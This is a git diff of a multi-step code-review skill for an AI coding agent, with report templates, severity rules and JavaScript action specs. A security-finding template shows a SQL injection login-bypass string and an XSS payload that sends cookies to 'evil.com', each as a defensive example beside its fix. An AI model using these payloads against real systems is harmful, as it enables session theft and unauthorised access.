||||
- Moderate performance impact
|
||||
- Code quality issues (complexity 11-15, duplication)
|
||||
- Missing tests for important features
|
||||
|
||||
### Low
|
||||
- Minor style violations
|
||||
- Missing documentation
|
||||
- Low-impact dead code
|
||||
@@ -1,316 +0,0 @@
|
||||
# Report Template
|
||||
|
||||
## Main Report Structure (REPORT.md)
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Scope**: {scope}
|
||||
**Files Reviewed**: {total_files}
|
||||
**Total Findings**: {total_findings}
|
||||
|
||||
---
|
||||
|
||||
## 📊 Executive Summary
|
||||
|
||||
### Overall Assessment
|
||||
|
||||
{Brief 2-3 paragraph assessment of code health}
|
||||
|
||||
### Risk Level: {LOW|MEDIUM|HIGH|CRITICAL}
|
||||
|
||||
{Risk assessment based on findings severity and count}
|
||||
|
||||
### Key Statistics
|
||||
|
||||
| Metric | Value | Status |
|
||||
|--------|-------|--------|
|
||||
| Total Files | {count} | - |
|
||||
| Files with Issues | {count} | {percentage}% |
|
||||
| Critical Findings | {count} | {icon} |
|
||||
| High Findings | {count} | {icon} |
|
||||
| Medium Findings | {count} | {icon} |
|
||||
| Low Findings | {count} | {icon} |
|
||||
|
||||
### Category Breakdown
|
||||
|
||||
| Category | Count | Percentage |
|
||||
|----------|-------|------------|
|
||||
| Security | {count} | {percentage}% |
|
||||
| Code Quality | {count} | {percentage}% |
|
||||
| Performance | {count} | {percentage}% |
|
||||
| Maintainability | {count} | {percentage}% |
|
||||
|
||||
---
|
||||
|
||||
## 🎯 Quality Scores
|
||||
|
||||
### Security Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Code Quality Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Performance Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Maintainability Score: {score}/100
|
||||
{Assessment and key issues}
|
||||
|
||||
### Overall Score: {score}/100
|
||||
|
||||
**Grade**: {A|B|C|D|F}
|
||||
|
||||
---
|
||||
|
||||
## 🔴 Critical Findings (Requires Immediate Action)
|
||||
|
||||
{List all critical findings using security-finding.md template}
|
||||
|
||||
---
|
||||
|
||||
## 🟠 High Priority Findings
|
||||
|
||||
{List all high findings}
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority Findings
|
||||
|
||||
{List all medium findings}
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Low Priority Findings
|
||||
|
||||
{List all low findings}
|
||||
|
||||
---
|
||||
|
||||
## 📋 Action Plan
|
||||
|
||||
### Immediate (Within 24 hours)
|
||||
1. {Critical issue 1}
|
||||
2. {Critical issue 2}
|
||||
3. {Critical issue 3}
|
||||
|
||||
### Short-term (Within 1 week)
|
||||
1. {High priority issue 1}
|
||||
2. {High priority issue 2}
|
||||
...
|
||||
|
||||
### Medium-term (Within 1 month)
|
||||
1. {Medium priority issue 1}
|
||||
2. {Medium priority issue 2}
|
||||
...
|
||||
|
||||
### Long-term (Within 3 months)
|
||||
1. {Low priority issue 1}
|
||||
2. {Improvement initiative 1}
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## 📊 Metrics Dashboard
|
||||
|
||||
### Code Health Trends
|
||||
|
||||
{If historical data available, show trends}
|
||||
|
||||
### File Hotspots
|
||||
|
||||
Top files with most issues:
|
||||
1. `{file-path}` - {count} issues ({severity breakdown})
|
||||
2. `{file-path}` - {count} issues
|
||||
...
|
||||
|
||||
### Technology Breakdown
|
||||
|
||||
Issues by language/framework:
|
||||
- TypeScript: {count} issues
|
||||
- Python: {count} issues
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## ✅ Compliance Status
|
||||
|
||||
### PCI DSS
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
### HIPAA
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
### GDPR
|
||||
- **Status**: {COMPLIANT|NON-COMPLIANT|PARTIAL}
|
||||
- **Affecting Findings**: {list}
|
||||
|
||||
---
|
||||
|
||||
## 📚 Appendix
|
||||
|
||||
### A. Review Configuration
|
||||
|
||||
\`\`\`json
|
||||
{review-config}
|
||||
\`\`\`
|
||||
|
||||
### B. Tools and Versions
|
||||
|
||||
- Code Reviewer Skill: v1.0.0
|
||||
- Security Rules: OWASP Top 10 2021, CWE Top 25
|
||||
- Languages Analyzed: {list}
|
||||
|
||||
### C. References
|
||||
|
||||
- [OWASP Top 10 2021](https://owasp.org/Top10/)
|
||||
- [CWE Top 25](https://cwe.mitre.org/top25/)
|
||||
- {additional references}
|
||||
|
||||
### D. Full Findings Index
|
||||
|
||||
{Links to detailed finding JSONs}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Fix Checklist Template (FIX-CHECKLIST.md)
|
||||
|
||||
```markdown
|
||||
# Code Review Fix Checklist
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Total Items**: {count}
|
||||
|
||||
---
|
||||
|
||||
## 🔴 Critical Issues (Fix Immediately)
|
||||
|
||||
- [ ] **[SEC-001]** SQL Injection in `src/auth/user-service.ts:145`
|
||||
- Effort: 1 hour
|
||||
- Priority: P0
|
||||
- Assignee: ___________
|
||||
|
||||
- [ ] **[SEC-002]** Hardcoded JWT Secret in `src/auth/jwt.ts:23`
|
||||
- Effort: 30 minutes
|
||||
- Priority: P0
|
||||
- Assignee: ___________
|
||||
|
||||
---
|
||||
|
||||
## 🟠 High Priority Issues (Fix This Week)
|
||||
|
||||
- [ ] **[SEC-003]** Missing Authorization in `src/api/admin.ts:34`
|
||||
- Effort: 2 hours
|
||||
- Priority: P1
|
||||
- Assignee: ___________
|
||||
|
||||
- [ ] **[BP-001]** N+1 Query in `src/api/orders.ts:45`
|
||||
- Effort: 1 hour
|
||||
- Priority: P1
|
||||
- Assignee: ___________
|
||||
|
||||
---
|
||||
|
||||
## 🟡 Medium Priority Issues (Fix This Month)
|
||||
|
||||
{List medium priority items}
|
||||
|
||||
---
|
||||
|
||||
## 🟢 Low Priority Issues (Fix Next Release)
|
||||
|
||||
{List low priority items}
|
||||
|
||||
---
|
||||
|
||||
## Progress Tracking
|
||||
|
||||
**Overall Progress**: {completed}/{total} ({percentage}%)
|
||||
|
||||
- Critical: {completed}/{total}
|
||||
- High: {completed}/{total}
|
||||
- Medium: {completed}/{total}
|
||||
- Low: {completed}/{total}
|
||||
|
||||
**Estimated Total Effort**: {hours} hours
|
||||
**Estimated Completion**: {date}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Summary JSON Template (summary.json)
|
||||
|
||||
```json
|
||||
{
|
||||
"report_date": "2024-01-15T12:00:00Z",
|
||||
"scope": "src/**/*",
|
||||
"statistics": {
|
||||
"total_files": 247,
|
||||
"files_with_issues": 89,
|
||||
"total_findings": 69,
|
||||
"by_severity": {
|
||||
"critical": 3,
|
||||
"high": 13,
|
||||
"medium": 30,
|
||||
"low": 23
|
||||
},
|
||||
"by_category": {
|
||||
"security": 24,
|
||||
"code_quality": 18,
|
||||
"performance": 12,
|
||||
"maintainability": 15
|
||||
}
|
||||
},
|
||||
"scores": {
|
||||
"security": 68,
|
||||
"code_quality": 75,
|
||||
"performance": 82,
|
||||
"maintainability": 70,
|
||||
"overall": 74
|
||||
},
|
||||
"grade": "C",
|
||||
"risk_level": "MEDIUM",
|
||||
"action_required": true,
|
||||
"compliance": {
|
||||
"pci_dss": {
|
||||
"status": "NON_COMPLIANT",
|
||||
"affecting_findings": ["SEC-001", "SEC-002", "SEC-008", "SEC-011"]
|
||||
},
|
||||
"hipaa": {
|
||||
"status": "NON_COMPLIANT",
|
||||
"affecting_findings": ["SEC-005", "SEC-009"]
|
||||
},
|
||||
"gdpr": {
|
||||
"status": "PARTIAL",
|
||||
"affecting_findings": ["SEC-002", "SEC-005", "SEC-007"]
|
||||
}
|
||||
},
|
||||
"top_issues": [
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"type": "sql-injection",
|
||||
"severity": "critical",
|
||||
"file": "src/auth/user-service.ts",
|
||||
"line": 145
|
||||
}
|
||||
],
|
||||
"hotspots": [
|
||||
{
|
||||
"file": "src/auth/user-service.ts",
|
||||
"issues": 5,
|
||||
"severity_breakdown": { "critical": 1, "high": 2, "medium": 2 }
|
||||
}
|
||||
],
|
||||
"effort_estimate": {
|
||||
"critical": 4.5,
|
||||
"high": 18,
|
||||
"medium": 35,
|
||||
"low": 12,
|
||||
"total_hours": 69.5
|
||||
}
|
||||
}
|
||||
```
|
||||
@@ -1,161 +0,0 @@
|
||||
# Security Finding Template
|
||||
|
||||
Use this template for documenting security vulnerabilities.
|
||||
|
||||
## Finding Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"id": "SEC-{number}",
|
||||
"type": "{vulnerability-type}",
|
||||
"severity": "{critical|high|medium|low}",
|
||||
"file": "{file-path}",
|
||||
"line": {line-number},
|
||||
"column": {column-number},
|
||||
"code": "{vulnerable-code-snippet}",
|
||||
"message": "{clear-description-of-issue}",
|
||||
"cwe": "CWE-{number}",
|
||||
"owasp": "A{number}:2021 - {category}",
|
||||
"recommendation": {
|
||||
"description": "{how-to-fix}",
|
||||
"fix_example": "{corrected-code}"
|
||||
},
|
||||
"references": [
|
||||
"https://...",
|
||||
"https://..."
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Markdown Template
|
||||
|
||||
```markdown
|
||||
### 🔴 [SEC-{number}] {Vulnerability Title}
|
||||
|
||||
**File**: `{file-path}:{line}`
|
||||
**CWE**: CWE-{number} | **OWASP**: A{number}:2021 - {category}
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`{language}
|
||||
{vulnerable-code-snippet}
|
||||
\`\`\`
|
||||
|
||||
**Issue**: {Detailed explanation of the vulnerability and potential impact}
|
||||
|
||||
**Attack Example** (if applicable):
|
||||
\`\`\`
|
||||
{example-attack-payload}
|
||||
Result: {what-happens}
|
||||
Effect: {security-impact}
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`{language}
|
||||
{corrected-code-with-comments}
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [{reference-title}]({url})
|
||||
- [{reference-title}]({url})
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Severity Icon Mapping
|
||||
|
||||
- Critical: 🔴
|
||||
- High: 🟠
|
||||
- Medium: 🟡
|
||||
- Low: 🟢
|
||||
|
||||
## Example: SQL Injection Finding
|
||||
|
||||
```markdown
|
||||
### 🔴 [SEC-001] SQL Injection in User Authentication
|
||||
|
||||
**File**: `src/auth/user-service.ts:145`
|
||||
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
||||
const user = await db.execute(query);
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands and bypass authentication.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
username: ' OR '1'='1' --
|
||||
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
||||
Effect: Bypasses authentication, returns all users
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use parameterized queries
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
const user = await db.execute(query, [username]);
|
||||
|
||||
// Or use ORM
|
||||
const user = await User.findOne({ where: { username } });
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
||||
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Example: XSS Finding
|
||||
|
||||
```markdown
|
||||
### 🟠 [SEC-002] Cross-Site Scripting (XSS) in Comment Rendering
|
||||
|
||||
**File**: `src/components/CommentList.tsx:89`
|
||||
**CWE**: CWE-79 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`tsx
|
||||
<div dangerouslySetInnerHTML={{ __html: comment.body }} />
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User-generated content rendered without sanitization, allowing script injection.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
comment.body: "<script>fetch('evil.com/steal?cookie='+document.cookie)</script>"
|
||||
Effect: Steals user session cookies
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`tsx
|
||||
import DOMPurify from 'dompurify';
|
||||
|
||||
// Sanitize HTML before rendering
|
||||
<div dangerouslySetInnerHTML={{
|
||||
__html: DOMPurify.sanitize(comment.body)
|
||||
}} />
|
||||
|
||||
// Or use text content (if HTML not needed)
|
||||
<div>{comment.body}</div>
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
|
||||
- [CWE-79](https://cwe.mitre.org/data/definitions/79.html)
|
||||
|
||||
---
|
||||
```
|
||||
|
||||
## Compliance Mapping Template
|
||||
|
||||
When finding affects compliance:
|
||||
|
||||
```markdown
|
||||
**Compliance Impact**:
|
||||
- **PCI DSS**: Requirement 6.5.1 (Injection flaws)
|
||||
- **HIPAA**: Technical Safeguards - Access Control
|
||||
- **GDPR**: Article 32 (Security of processing)
|
||||
```
|
||||
170
.claude/skills/review-code/SKILL.md
Normal file
@@ -0,0 +1,170 @@
|
||||
---
|
||||
name: review-code
|
||||
description: Multi-dimensional code review with structured reports. Analyzes correctness, readability, performance, security, testing, and architecture. Triggers on "review code", "code review", "审查代码", "代码审查".
|
||||
allowed-tools: Task, AskUserQuestion, Read, Write, Glob, Grep, Bash, mcp__ace-tool__search_context, mcp__ide__getDiagnostics
|
||||
---
|
||||
|
||||
# Review Code
|
||||
|
||||
Multi-dimensional code review skill that analyzes code across 6 key dimensions and generates structured review reports with actionable recommendations.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ ⚠️ Phase 0: Specification Study (强制前置) │
|
||||
│ → 阅读 specs/review-dimensions.md │
|
||||
│ → 理解审查维度和问题分类标准 │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Orchestrator (状态驱动决策) │
|
||||
│ → 读取状态 → 选择审查动作 → 执行 → 更新状态 │
|
||||
└───────────────┬─────────────────────────────────────────────────┘
|
||||
│
|
||||
┌───────────┼───────────┬───────────┬───────────┐
|
||||
↓ ↓ ↓ ↓ ↓
|
||||
┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐
|
||||
│ Collect │ │ Quick │ │ Deep │ │ Report │ │Complete │
|
||||
│ Context │ │ Scan │ │ Review │ │ Generate│ │ │
|
||||
└─────────┘ └─────────┘ └─────────┘ └─────────┘ └─────────┘
|
||||
↓ ↓ ↓ ↓
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Review Dimensions │
|
||||
│ ┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ │
|
||||
│ │Correctness│ │Readability│ │Performance│ │ Security │ │
|
||||
│ └──────────┘ └──────────┘ └──────────┘ └──────────┘ │
|
||||
│ ┌──────────┐ ┌──────────┐ │
|
||||
│ │ Testing │ │Architecture│ │
|
||||
│ └──────────┘ └──────────┘ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Key Design Principles
|
||||
|
||||
1. **多维度审查**: 覆盖正确性、可读性、性能、安全性、测试覆盖、架构一致性六大维度
|
||||
2. **分层执行**: 快速扫描识别高风险区域,深入审查聚焦关键问题
|
||||
3. **结构化报告**: 按严重程度分类,提供文件位置和修复建议
|
||||
4. **状态驱动**: 自主模式,根据审查进度动态选择下一步动作
|
||||
|
||||
---
|
||||
|
||||
## ⚠️ Mandatory Prerequisites (强制前置条件)
|
||||
|
||||
> **⛔ 禁止跳过**: 在执行任何审查操作之前,**必须**完整阅读以下文档。
|
||||
|
||||
### 规范文档 (必读)
|
||||
|
||||
| Document | Purpose | Priority |
|
||||
|----------|---------|----------|
|
||||
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度定义和检查点 | **P0 - 最高** |
|
||||
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类和严重程度标准 | **P0 - 最高** |
|
||||
| [specs/quality-standards.md](specs/quality-standards.md) | 审查质量标准 | P1 |
|
||||
|
||||
### 模板文件 (生成前必读)
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [templates/review-report.md](templates/review-report.md) | 审查报告模板 |
|
||||
| [templates/issue-template.md](templates/issue-template.md) | 问题记录模板 |
|
||||
|
||||
---
|
||||
|
||||
## Execution Flow
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Phase 0: Specification Study (强制前置 - 禁止跳过) │
|
||||
│ → Read: specs/review-dimensions.md │
|
||||
│ → Read: specs/issue-classification.md │
|
||||
│ → 理解审查标准和问题分类 │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: collect-context │
|
||||
│ → 收集目标文件/目录 │
|
||||
│ → 识别技术栈和语言 │
|
||||
│ → Output: state.context (files, language, framework) │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: quick-scan │
|
||||
│ → 快速扫描整体结构 │
|
||||
│ → 识别高风险区域 │
|
||||
│ → Output: state.risk_areas, state.scan_summary │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: deep-review (per dimension) │
|
||||
│ → 逐维度深入审查 │
|
||||
│ → 记录发现的问题 │
|
||||
│ → Output: state.findings[] │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: generate-report │
|
||||
│ → 汇总所有发现 │
|
||||
│ → 生成结构化报告 │
|
||||
│ → Output: review-report.md │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ Action: complete │
|
||||
│ → 保存最终状态 │
|
||||
│ → 输出审查摘要 │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Directory Setup
|
||||
|
||||
```javascript
|
||||
const timestamp = new Date().toISOString().slice(0,19).replace(/[-:T]/g, '');
|
||||
const workDir = `.workflow/.scratchpad/review-code-${timestamp}`;
|
||||
|
||||
Bash(`mkdir -p "${workDir}"`);
|
||||
Bash(`mkdir -p "${workDir}/findings"`);
|
||||
```
|
||||
|
||||
## Output Structure
|
||||
|
||||
```
|
||||
.workflow/.scratchpad/review-code-{timestamp}/
|
||||
├── state.json # 审查状态
|
||||
├── context.json # 目标上下文
|
||||
├── findings/ # 问题发现
|
||||
│ ├── correctness.json
|
||||
│ ├── readability.json
|
||||
│ ├── performance.json
|
||||
│ ├── security.json
|
||||
│ ├── testing.json
|
||||
│ └── architecture.json
|
||||
└── review-report.md # 最终审查报告
|
||||
```
|
||||
|
||||
## Review Dimensions
|
||||
|
||||
| Dimension | Focus Areas | Key Checks |
|
||||
|-----------|-------------|------------|
|
||||
| **Correctness** | 逻辑正确性 | 边界条件、错误处理、null 检查 |
|
||||
| **Readability** | 代码可读性 | 命名规范、函数长度、注释质量 |
|
||||
| **Performance** | 性能效率 | 算法复杂度、I/O 优化、资源使用 |
|
||||
| **Security** | 安全性 | 注入风险、敏感信息、权限控制 |
|
||||
| **Testing** | 测试覆盖 | 测试充分性、边界覆盖、可维护性 |
|
||||
| **Architecture** | 架构一致性 | 设计模式、分层结构、依赖管理 |
|
||||
|
||||
## Issue Severity Levels
|
||||
|
||||
| Level | Prefix | Description | Action Required |
|
||||
|-------|--------|-------------|-----------------|
|
||||
| **Critical** | [C] | 阻塞性问题,必须立即修复 | Must fix before merge |
|
||||
| **High** | [H] | 重要问题,需要修复 | Should fix |
|
||||
| **Medium** | [M] | 建议改进 | Consider fixing |
|
||||
| **Low** | [L] | 可选优化 | Nice to have |
|
||||
| **Info** | [I] | 信息性建议 | For reference |
|
||||
|
||||
## Reference Documents
|
||||
|
||||
| Document | Purpose |
|
||||
|----------|---------|
|
||||
| [phases/orchestrator.md](phases/orchestrator.md) | 审查编排器 |
|
||||
| [phases/state-schema.md](phases/state-schema.md) | 状态结构定义 |
|
||||
| [phases/actions/action-collect-context.md](phases/actions/action-collect-context.md) | 收集上下文 |
|
||||
| [phases/actions/action-quick-scan.md](phases/actions/action-quick-scan.md) | 快速扫描 |
|
||||
| [phases/actions/action-deep-review.md](phases/actions/action-deep-review.md) | 深入审查 |
|
||||
| [phases/actions/action-generate-report.md](phases/actions/action-generate-report.md) | 生成报告 |
|
||||
| [phases/actions/action-complete.md](phases/actions/action-complete.md) | 完成审查 |
|
||||
| [specs/review-dimensions.md](specs/review-dimensions.md) | 审查维度规范 |
|
||||
| [specs/issue-classification.md](specs/issue-classification.md) | 问题分类标准 |
|
||||
| [specs/quality-standards.md](specs/quality-standards.md) | 质量标准 |
|
||||
| [templates/review-report.md](templates/review-report.md) | 报告模板 |
|
||||
| [templates/issue-template.md](templates/issue-template.md) | 问题模板 |
|
||||
@@ -0,0 +1,139 @@
|
||||
# Action: Collect Context
|
||||
|
||||
收集审查目标的上下文信息。
|
||||
|
||||
## Purpose
|
||||
|
||||
在开始审查前,收集目标代码的基本信息:
|
||||
- 确定审查范围(文件/目录)
|
||||
- 识别编程语言和框架
|
||||
- 统计代码规模
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'pending' || state.context === null
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
// 1. 询问用户审查目标
|
||||
const input = await AskUserQuestion({
|
||||
questions: [{
|
||||
question: "请指定要审查的代码路径:",
|
||||
header: "审查目标",
|
||||
multiSelect: false,
|
||||
options: [
|
||||
{ label: "当前目录", description: "审查当前工作目录下的所有代码" },
|
||||
{ label: "src/", description: "审查 src/ 目录" },
|
||||
{ label: "手动指定", description: "输入自定义路径" }
|
||||
]
|
||||
}]
|
||||
});
|
||||
|
||||
const targetPath = input["审查目标"] === "手动指定"
|
||||
? input["其他"]
|
||||
: input["审查目标"] === "当前目录" ? "." : "src/";
|
||||
|
||||
// 2. 收集文件列表
|
||||
const files = Glob(`${targetPath}/**/*.{ts,tsx,js,jsx,py,java,go,rs,cpp,c,cs}`);
|
||||
|
||||
// 3. 检测主要语言
|
||||
const languageCounts = {};
|
||||
files.forEach(file => {
|
||||
const ext = file.split('.').pop();
|
||||
const langMap = {
|
||||
'ts': 'TypeScript', 'tsx': 'TypeScript',
|
||||
'js': 'JavaScript', 'jsx': 'JavaScript',
|
||||
'py': 'Python',
|
||||
'java': 'Java',
|
||||
'go': 'Go',
|
||||
'rs': 'Rust',
|
||||
'cpp': 'C++', 'c': 'C',
|
||||
'cs': 'C#'
|
||||
};
|
||||
const lang = langMap[ext] || 'Unknown';
|
||||
languageCounts[lang] = (languageCounts[lang] || 0) + 1;
|
||||
});
|
||||
|
||||
const primaryLanguage = Object.entries(languageCounts)
|
||||
.sort((a, b) => b[1] - a[1])[0]?.[0] || 'Unknown';
|
||||
|
||||
// 4. 统计代码行数
|
||||
let totalLines = 0;
|
||||
for (const file of files.slice(0, 100)) { // 限制前100个文件
|
||||
try {
|
||||
const content = Read(file);
|
||||
totalLines += content.split('\n').length;
|
||||
} catch (e) {}
|
||||
}
|
||||
|
||||
// 5. 检测框架
|
||||
let framework = null;
|
||||
if (files.some(f => f.includes('package.json'))) {
|
||||
const pkg = JSON.parse(Read('package.json'));
|
||||
if (pkg.dependencies?.react) framework = 'React';
|
||||
else if (pkg.dependencies?.vue) framework = 'Vue';
|
||||
else if (pkg.dependencies?.angular) framework = 'Angular';
|
||||
else if (pkg.dependencies?.express) framework = 'Express';
|
||||
else if (pkg.dependencies?.next) framework = 'Next.js';
|
||||
}
|
||||
|
||||
// 6. 构建上下文
|
||||
const context = {
|
||||
target_path: targetPath,
|
||||
files: files.slice(0, 200), // 限制最多200个文件
|
||||
language: primaryLanguage,
|
||||
framework: framework,
|
||||
total_lines: totalLines,
|
||||
file_count: files.length
|
||||
};
|
||||
|
||||
// 7. 保存上下文
|
||||
Write(`${workDir}/context.json`, JSON.stringify(context, null, 2));
|
||||
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'running',
|
||||
context: context
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'running',
|
||||
context: {
|
||||
target_path: targetPath,
|
||||
files: fileList,
|
||||
language: primaryLanguage,
|
||||
framework: detectedFramework,
|
||||
total_lines: totalLines,
|
||||
file_count: fileCount
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **File**: `context.json`
|
||||
- **Location**: `${workDir}/context.json`
|
||||
- **Format**: JSON
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 路径不存在 | 提示用户重新输入 |
|
||||
| 无代码文件 | 返回错误,终止审查 |
|
||||
| 读取权限问题 | 跳过该文件,记录警告 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 成功: action-quick-scan
|
||||
- 失败: action-abort
|
||||
115
.claude/skills/review-code/phases/actions/action-complete.md
Normal file
@@ -0,0 +1,115 @@
|
||||
# Action: Complete
|
||||
|
||||
完成审查,保存最终状态。
|
||||
|
||||
## Purpose
|
||||
|
||||
结束代码审查流程:
|
||||
- 保存最终状态
|
||||
- 输出审查摘要
|
||||
- 提供报告路径
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.report_generated === true
|
||||
|
||||
## Execution
|
||||
|
||||
```javascript
|
||||
async function execute(state, workDir) {
|
||||
// 1. 计算审查时长
|
||||
const duration = Date.now() - new Date(state.started_at).getTime();
|
||||
const durationMinutes = Math.round(duration / 60000);
|
||||
|
||||
// 2. 生成最终摘要
|
||||
const summary = {
|
||||
...state.summary,
|
||||
review_duration_ms: duration,
|
||||
completed_at: new Date().toISOString()
|
||||
};
|
||||
|
||||
// 3. 保存最终状态
|
||||
const finalState = {
|
||||
...state,
|
||||
status: 'completed',
|
||||
completed_at: summary.completed_at,
|
||||
summary: summary
|
||||
};
|
||||
|
||||
Write(`${workDir}/state.json`, JSON.stringify(finalState, null, 2));
|
||||
|
||||
// 4. 输出摘要信息
|
||||
console.log('========================================');
|
||||
console.log(' CODE REVIEW COMPLETED');
|
||||
console.log('========================================');
|
||||
console.log('');
|
||||
console.log(`📁 审查目标: ${state.context.target_path}`);
|
||||
console.log(`📄 文件数量: ${state.context.file_count}`);
|
||||
console.log(`📝 代码行数: ${state.context.total_lines}`);
|
||||
console.log('');
|
||||
console.log('--- 问题统计 ---');
|
||||
console.log(`🔴 Critical: ${summary.critical}`);
|
||||
console.log(`🟠 High: ${summary.high}`);
|
||||
console.log(`🟡 Medium: ${summary.medium}`);
|
||||
console.log(`🔵 Low: ${summary.low}`);
|
||||
console.log(`⚪ Info: ${summary.info}`);
|
||||
console.log(`📊 Total: ${summary.total_issues}`);
|
||||
console.log('');
|
||||
console.log(`⏱️ 审查用时: ${durationMinutes} 分钟`);
|
||||
console.log('');
|
||||
console.log(`📋 报告位置: ${state.report_path}`);
|
||||
console.log('========================================');
|
||||
|
||||
// 5. 返回状态更新
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'completed',
|
||||
completed_at: summary.completed_at,
|
||||
summary: summary
|
||||
}
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
## State Updates
|
||||
|
||||
```javascript
|
||||
return {
|
||||
stateUpdates: {
|
||||
status: 'completed',
|
||||
completed_at: new Date().toISOString(),
|
||||
summary: {
|
||||
total_issues: state.summary.total_issues,
|
||||
critical: state.summary.critical,
|
||||
high: state.summary.high,
|
||||
medium: state.summary.medium,
|
||||
low: state.summary.low,
|
||||
info: state.summary.info,
|
||||
review_duration_ms: duration
|
||||
}
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
- **Console**: 审查完成摘要
|
||||
- **State**: 最终状态保存到 `state.json`
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Error Type | Recovery |
|
||||
|------------|----------|
|
||||
| 状态保存失败 | 输出到控制台 |
|
||||
|
||||
## Next Actions
|
||||
|
||||
- 无(终止状态)
|
||||
|
||||
## Post-Completion
|
||||
|
||||
用户可以:
|
||||
1. 查看完整报告: `cat ${workDir}/review-report.md`
|
||||
2. 查看问题详情: `cat ${workDir}/findings/*.json`
|
||||
3. 导出报告到其他位置
|
||||
302
.claude/skills/review-code/phases/actions/action-deep-review.md
Normal file
@@ -0,0 +1,302 @@
|
||||
# Action: Deep Review
|
||||
|
||||
深入审查指定维度的代码质量。
|
||||
|
||||
## Purpose
|
||||
|
||||
针对单个维度进行深入审查:
|
||||
- 逐文件检查
|
||||
- 记录发现的问题
|
||||
- 提供具体的修复建议
|
||||
|
||||
## Preconditions
|
||||
|
||||
- [ ] state.status === 'running'
|
||||
- [ ] state.scan_completed === true
|
||||
- [ ] 存在未审查的维度
|
||||
|
||||
## Dimension Focus Areas
|
||||
|
||||
### Correctness (正确性)
|
||||
- 逻辑错误和边界条件
|
||||
- Null/undefined 处理
|
||||
- 错误处理完整性
|
||||
- 类型安全
|
||||
- 资源泄漏
|
||||
|
